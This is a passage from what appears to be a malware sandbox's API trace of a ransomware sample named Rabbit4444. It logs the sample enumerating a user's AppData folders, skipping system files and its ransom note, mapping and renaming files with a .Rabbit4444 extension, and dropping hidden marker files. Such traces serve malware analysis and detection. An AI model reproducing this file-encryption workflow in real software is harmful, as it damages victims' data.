lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\bba8ff68-64fb-4605-ae42-fe59570f7bb7.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\bba8ff68-64fb-4605-ae42-fe59570f7bb7.rabbit4444"), dwFlags=0x1) returned 1 [0062.865] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc4059cc, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdc4059cc, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdc478053, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x3ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", cAlternateFileName="CF3050~1")) returned 1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2="Rabbit4444.exe") returned -1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2=".") returned 1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2="..") returned 1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2="windows") returned -1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2="bootmgr") returned 1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2="pagefile.sys") returned -1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2="boot") returned 1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2="ids.txt") returned -1 [0062.865] lstrcmpiW (lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", lpString2="NTUSER.DAT") returned -1 [0062.865] lstrcpyW (in: lpString1=0x130ec04, lpString2="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9" | out: lpString1="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9") returned="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9" [0062.865] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\cf305046-df1e-43ca-88e4-ce3ad1b7bfa9", dwFileAttributes=0x0) returned 1 [0062.866] lstrlenW (lpString="cf305046-df1e-43ca-88e4-ce3ad1b7bfa9") returned 36 [0062.866] lstrlenW (lpString="Rabbit4444") returned 10 [0062.866] lstrcmpiW (lpString1="3ad1b7bfa9", lpString2="Rabbit4444") returned -1 [0062.866] lstrlenW (lpString=".dll") returned 4 [0062.866] lstrcmpiW (lpString1="bfa9", lpString2=".dll") returned 1 [0062.866] lstrlenW (lpString=".lnk") returned 4 [0062.866] lstrcmpiW (lpString1="bfa9", lpString2=".lnk") returned 1 [0062.866] lstrlenW (lpString=".ini") returned 4 [0062.866] lstrcmpiW (lpString1="bfa9", lpString2=".ini") returned 1 [0062.866] lstrlenW (lpString=".sys") returned 4 [0062.866] lstrcmpiW (lpString1="bfa9", lpString2=".sys") returned 1 [0062.866] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\cf305046-df1e-43ca-88e4-ce3ad1b7bfa9" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\cf305046-df1e-43ca-88e4-ce3ad1b7bfa9"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.867] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.867] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15417730417) returned 1 [0062.867] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=940) returned 1 [0062.867] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0062.867] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0062.867] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x27c [0062.870] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0062.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0062.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0062.871] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0062.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.872] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0062.872] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15418231351) returned 1 [0062.872] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0062.872] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0062.872] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.872] CloseHandle (hObject=0x27c) returned 1 [0062.872] CloseHandle (hObject=0x2a0) returned 1 [0062.872] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\cf305046-df1e-43ca-88e4-ce3ad1b7bfa9.Rabbit4444") returned 149 [0062.872] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\cf305046-df1e-43ca-88e4-ce3ad1b7bfa9" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\cf305046-df1e-43ca-88e4-ce3ad1b7bfa9"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\cf305046-df1e-43ca-88e4-ce3ad1b7bfa9.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\cf305046-df1e-43ca-88e4-ce3ad1b7bfa9.rabbit4444"), dwFlags=0x1) returned 1 [0062.873] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc641aa1, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdc641aa1, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xe1726223, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x1da5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index", cAlternateFileName="")) returned 1 [0062.873] lstrcmpiW (lpString1="index", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.873] lstrcmpiW (lpString1="index", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.873] lstrcmpiW (lpString1="index", lpString2="Rabbit4444.exe") returned -1 [0062.873] lstrcmpiW (lpString1="index", lpString2=".") returned 1 [0062.873] lstrcmpiW (lpString1="index", lpString2="..") returned 1 [0062.873] lstrcmpiW (lpString1="index", lpString2="windows") returned -1 [0062.873] lstrcmpiW (lpString1="index", lpString2="bootmgr") returned 1 [0062.873] lstrcmpiW (lpString1="index", lpString2="pagefile.sys") returned -1 [0062.873] lstrcmpiW (lpString1="index", lpString2="boot") returned 1 [0062.873] lstrcmpiW (lpString1="index", lpString2="ids.txt") returned 1 [0062.873] lstrcmpiW (lpString1="index", lpString2="NTUSER.DAT") returned -1 [0062.873] lstrcpyW (in: lpString1=0x130ec04, lpString2="index" | out: lpString1="index") returned="index" [0062.873] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\index", dwFileAttributes=0x0) returned 1 [0062.873] lstrlenW (lpString="index") returned 5 [0062.873] lstrlenW (lpString="Rabbit4444") returned 10 [0062.873] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0062.873] lstrlenW (lpString=".dll") returned 4 [0062.873] lstrcmpiW (lpString1="ndex", lpString2=".dll") returned 1 [0062.873] lstrlenW (lpString=".lnk") returned 4 [0062.873] lstrcmpiW (lpString1="ndex", lpString2=".lnk") returned 1 [0062.873] lstrlenW (lpString=".ini") returned 4 [0062.874] lstrcmpiW (lpString1="ndex", lpString2=".ini") returned 1 [0062.874] lstrlenW (lpString=".sys") returned 4 [0062.874] lstrcmpiW (lpString1="ndex", lpString2=".sys") returned 1 [0062.874] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\index"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.874] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.874] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15418467322) returned 1 [0062.874] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=7589) returned 1 [0062.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0062.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0062.874] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20b0, lpName=0x0) returned 0x27c [0062.875] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20b0) returned 0x70000 [0062.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0062.877] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0062.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0062.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0062.878] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15418842464) returned 1 [0062.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0062.878] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0062.878] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.878] CloseHandle (hObject=0x27c) returned 1 [0062.878] CloseHandle (hObject=0x2a0) returned 1 [0062.878] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\index.Rabbit4444") returned 118 [0062.878] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\index"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\index.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\index.rabbit4444"), dwFlags=0x1) returned 1 [0062.879] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc641aa1, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdc641aa1, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xe1726223, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x1da5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index", cAlternateFileName="")) returned 0 [0062.879] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0062.879] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.879] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.879] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0062.879] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.881] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.881] CloseHandle (hObject=0x2a0) returned 1 [0062.881] CloseHandle (hObject=0x298) returned 1 [0062.881] GetCurrentThreadId () returned 0xd98 [0062.881] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122048 [0062.881] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData" [0062.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ec8 | out: hHeap=0xe0000) returned 1 [0062.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122040 | out: hHeap=0xe0000) returned 1 [0062.881] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData" [0062.881] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\" [0062.881] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0062.881] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.883] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.885] FlushFileBuffers (hFile=0x298) returned 1 [0062.886] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.886] CloseHandle (hObject=0x298) returned 1 [0062.887] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData") returned 83 [0062.887] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.887] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40e351b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f214ce, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeece1ee8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0062.887] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.887] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.887] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.887] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.887] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40e351b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f214ce, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeece1ee8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.887] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.887] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.887] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.887] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.887] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.887] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeece1ee8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeece1ee8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeece1ee8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.887] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.887] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.888] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeece1ee8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeece1ee8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeece1ee8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.888] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0062.888] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.888] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.888] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0062.888] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.889] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.889] CloseHandle (hObject=0x2a0) returned 1 [0062.889] CloseHandle (hObject=0x298) returned 1 [0062.889] GetCurrentThreadId () returned 0xd98 [0062.889] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0062.889] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC" [0062.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121710 | out: hHeap=0xe0000) returned 1 [0062.889] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0062.889] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC" [0062.889] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\" [0062.889] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0062.889] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.890] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.892] FlushFileBuffers (hFile=0x298) returned 1 [0062.893] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.893] CloseHandle (hObject=0x298) returned 1 [0062.894] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC") returned 78 [0062.894] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.894] FindFirstFileW (in: 